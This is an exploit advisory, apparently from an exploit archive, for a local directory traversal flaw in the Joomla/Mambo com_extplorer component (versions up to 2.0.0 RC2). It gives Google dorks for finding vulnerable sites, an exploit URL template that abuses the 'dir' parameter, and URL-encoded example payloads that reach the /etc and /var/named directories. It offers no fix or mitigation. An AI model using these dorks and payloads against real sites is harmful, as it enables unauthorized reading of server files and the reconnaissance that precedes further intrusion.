Joomla Component com_extplorer <= 2.0.0 RC2 Local Directory Traversal

2008-04-13
ID: 2872
CVE: None
Download vulnerable application: None
--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component com_extplorer
= version : <= 2.0.0 RC2
= Download : http://joomlacode.org/gf/download/frsrelease/6717/21992/com_extplorer_2.0.0_RC2.zip

= Dork1 : inurl:index.php?option=com_extplorer
= Dork2 : powered by extplorer
          			           
							   
= BUG  :  Local Directory Traversal 

exploit => target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed



1-4-2 (www02)